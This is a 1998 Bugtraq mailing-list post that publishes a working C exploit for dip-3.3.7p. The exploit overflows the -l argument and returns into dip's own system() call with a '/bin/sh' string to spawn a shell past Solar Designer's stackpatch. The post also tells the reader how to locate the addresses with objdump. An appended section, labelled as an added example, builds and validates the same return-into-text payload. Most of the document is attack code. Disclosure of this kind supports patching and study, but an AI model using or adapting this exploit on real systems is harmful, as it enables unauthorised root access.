dip-3.3.7p exploit (stackpatch)
Date: Fri, 26 Jun 1998 17:46:53 +0200
From: Thomas Troeger <tstroege@CIP.INFORMATIK.UNI-ERLANGEN.DE>
To: BUGTRAQ@NETSPACE.ORG
Subject: dip-3.3.7p exploit (stackpatch)
Hi,
While playing around with dip-3.3.7p I realized that the method I used in my
previous posting won't do. So I had a look at the source and developed a new
program. Here it goes:
------------------- sammeltonne.c -------------------
/*
 * Program to get a shell from dip-3.3.7p on a system with
 * Solar Designer's stackpatch installed.
 * by tstroege@cip.informatik.uni-erlangen.de
 *
 * Of course this is just for educational purposes too :)
 */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define SOMETEXT 0x0804cee5
/* address in dip's text segment of the call to system() */
#define CMDSTR 0x08054f0e
/* address where the command string ("/bin/sh") is stored */
#define DIP "/usr/sbin/dip"
/* path of dip */

int main(int argc, char *argv[]) {
	char mem[256], *ptr;
	/* the overlong -l argument overflows a buffer inside dip */
	char *name[]={ DIP, "-k", "-l", mem, (char *)0 };
	/* saved return address -> SOMETEXT; the following word -> argument for system() */
	int i, code[]={ SOMETEXT, CMDSTR, 0 };
	int off=117;	/* distance from the start of the buffer to the saved return address */

	if (argc > 1) off=atoi(argv[1]);	/* the offset can be adjusted on the command line */
	for (ptr=mem, i=0; i < 256; i++) *ptr++='a';	/* filler */
	ptr=mem+off;
	/* copies the two addresses byte by byte; the trailing 0 word stops strcpy() */
	strcpy(ptr, (char *)&(code[0]));
	mem[255]=0;	/* argv strings must be NUL-terminated */
	execve(name[0], name, 0);
	return 0;
}
-----------------------------------------------
SOMETEXT:
address in the text segment where system() is called.
CMDSTR:
address in the text segment where a suitable command string is stored
(dip is nice enough to have a /bin/sh string in its code).
Both addresses will differ on your system, so here is a way to
find them:
...
objdump --disassemble-all /usr/sbin/dip
...
Now search for the following pattern:
...
0804ced4 pushl %ebx
0804ced5 pushl $0x8054848
0804ceda pushl $0x6
0804cedc call 08049678
0804cee1 addl $0xc,%esp
0804cee4 pushl %ebx
-->0804cee5 call 080493c8 SOMETEXT
0804ceea addl $0x4,%esp
0804ceed testl %eax,%eax
0804ceef jne 0804cf9e
0804cef5 pushl %esi
0804cef6 movl 0x8(%ebp),%eax
0804cef9 movl 0x660(%eax),%eax
0804ceff pushl %eax
...
0804eefd leal 0xfffffc00(%ebp),%eax
0804ef03 pushl %eax
0804ef04 pushl $0x8054f08
0804ef09 pushl $0x8054f0b
0804ef0e pushl $0x8054f0e<-- CMDSTR
0804ef13 call 08049368
0804ef18 pushl $0x7f
0804ef1a call 08049768
0804ef1f nop
...
tst.
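Added example (not part of the post above, not dip's code): the payload layout the
exploit relies on, written out with the two checks a practitioner would make before
using such addresses. The victim function's `ret` pops the overwritten saved EIP
(SOMETEXT, the address of the `call system` instruction); that `call` then pushes
its own return address, so system() finds the next word of the overflow (CMDSTR)
at [esp+4] as its argument. Because the payload travels as an argv string and
through the victim's own strcpy(), no address may contain a zero byte. The
five-byte instruction encoding below is constructed from the listing (a near
`call` is E8 + rel32; `call 080493c8` at 0804cee5 gives rel32 = -0x3b22); the
addresses and offset are the ones quoted in the post and differ on other builds.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PAYLOAD_LEN 256                 /* size of the buffer handed to dip as -l */

/* Values quoted in the post; assumed here only for illustration. */
#define SOMETEXT 0x0804cee5u            /* address of the `call system` instruction */
#define CMDSTR   0x08054f0eu            /* address of "/bin/sh" inside dip */
#define RET_OFF  117                    /* filler bytes before the saved return address */

uint8_t g_payload[PAYLOAD_LEN];

/* Constructed sample: the bytes an objdump of `0804cee5 call 080493c8` would
 * show, i.e. opcode E8 followed by rel32 = 0x080493c8 - 0x0804ceea = -0x3b22. */
const uint8_t g_sometext_bytes[5] = { 0xe8, 0xde, 0xc4, 0xff, 0xff };
/* Constructed sample of something that is not a call (addl $0x4,%esp; nop; nop). */
const uint8_t g_not_a_call[5]     = { 0x83, 0xc4, 0x04, 0x90, 0x90 };

/* Little-endian i386 encoding of a 32-bit word. */
static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;
    p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);
    p[3] = (uint8_t)(v >> 24);
}

/* An argv string ends at the first NUL, and so does the victim's strcpy().
 * An address with a zero byte therefore cannot be delivered this way. */
static int has_nul_byte(uint32_t v) {
    for (int i = 0; i < 4; i++)
        if (((v >> (8 * i)) & 0xffu) == 0) return 1;
    return 0;
}

/* Layout: off filler bytes, then the saved-EIP overwrite (ret_addr), then the
 * word the callee of that `call` instruction will read as its first argument.
 * Returns 0 on success, -1 if the two words do not fit or contain a NUL. */
int build_payload(uint8_t *buf, size_t len, size_t off,
                  uint32_t ret_addr, uint32_t arg) {
    if (off + 8 >= len) return -1;                  /* room for 2 words + terminator */
    if (has_nul_byte(ret_addr) || has_nul_byte(arg)) return -1;
    memset(buf, 'a', len);
    put_le32(buf + off, ret_addr);
    put_le32(buf + off + 4, arg);
    buf[len - 1] = 0;                               /* argv strings are NUL-terminated */
    return 0;
}

/* Check that the bytes at `at` really are a near call and compute its target:
 * target = address of the next instruction (at + 5) + rel32, modulo 2^32.
 * Returns 0 if the bytes are not an E8 call. Use this to confirm SOMETEXT
 * points at the call to the system() stub before running the exploit. */
uint32_t decode_call_target(uint32_t at, const uint8_t code[5]) {
    if (code[0] != 0xe8) return 0;
    uint32_t rel = (uint32_t)code[1] | ((uint32_t)code[2] << 8)
                 | ((uint32_t)code[3] << 16) | ((uint32_t)code[4] << 24);
    return at + 5u + rel;                           /* wraps like the CPU does */
}

int main(void) {
    uint32_t target = decode_call_target(SOMETEXT, g_sometext_bytes);
    printf("SOMETEXT %08x is a call to %08x\n", SOMETEXT, (unsigned)target);

    if (build_payload(g_payload, PAYLOAD_LEN, RET_OFF, SOMETEXT, CMDSTR) != 0) {
        puts("payload layout not possible (NUL byte or offset out of range)");
        return 1;
    }
    printf("payload bytes at offset %d:", RET_OFF);
    for (int i = 0; i < 8; i++) printf(" %02x", g_payload[RET_OFF + i]);
    puts("");
    return 0;
}
```

The same two checks apply to any return-into-text payload of this kind: verify
the gadget address decodes to the call you expect, and reject any address the
string copy would truncate.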